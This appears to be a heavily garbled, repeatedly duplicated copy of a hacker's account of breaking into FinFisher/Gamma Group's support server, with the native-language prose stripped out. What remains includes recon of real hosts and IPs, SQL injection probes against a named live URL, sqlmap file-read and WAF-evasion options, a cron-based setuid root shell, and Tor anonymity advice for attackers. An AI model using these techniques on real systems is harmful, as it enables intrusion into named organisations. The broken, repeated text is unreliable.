___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

  C:\Documents and Settings\\Local Settings\Temp\   -     .      Dynamic forking (Process hollowing),             ,   .                  ( ,     ).        MBR    .           C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} ,   ,  ,  (    -),    Skype   .             IP (     77.69.140.194)   22, 53, 80, 443, 4111 (  -   ). 
 
     : 
 
   40            Skype (, ,  , ,  )      (email, , VoIP)     -                          (Windows, Mac OSX  Linux) 
 
        ,   FinFisher     .     ,       ,        . 
 
       .      ,    -     -.               . 
 
        . 
 
     
 
 ,    - - ,       : 
 
          Truecrypt 7.1a .     Whonix .     Debian,           Tor.    ,  Whonix       Tor,  - ,        -.         aircrack-ng  reaver,     cantenna. 
 
          Whonix,    - ,      ,              ,   -    .      -      . 
 
 : ,        Tor.    ,   -,      -     nmap, sqlmap  nikto,       ,  Tor   .           VPS.     Tor      , ,   ,     . 
 
   
 
      fierce ,       whois-  IP-   . 
 
       Blackwater.     -     (academi.com).   : 
 
 fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com 
 
   whois-   www.academi.com      ,     Amazon Web Service. 
 
 NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd 
 
 whois-  academi.com  ,        ( 850 Puddin Ridge Rd ),        whois-. ,         ,      Google: 
 
 "850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools 
 
    IP-,   fierce.pl    ,  fierce.pl -dns -    IP-.      ,     ,   . 
 
     Google       . ,  academi.com    , -    : 
 
 54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com 
 
   whois-    ,  academiproshop.com     ,       . 
 
   FinFisher    finsupport.finfisher.com    whois-  finfisher.com ,       " FinFisher GmbH ".  "FinFisher GmbH" inurl:domaintools  gamma-international.de ,    finsupport.finfisher.com . 
 
  ,     . ,      ,    ,    ,       . 
 
    
 
  nmap-   IP-      .         SNMP-. 
 
       : 
 
     -,    ?    ,    ,    ,    URL  IP     .    fierce    git-,    git.companyname.come/gitweb/        .    ? ,   FTP-,            .        .    (VOIP-, IP-, ...)       .          ? 
 
 -    .  ,  ,  nmap    ,    : 
 
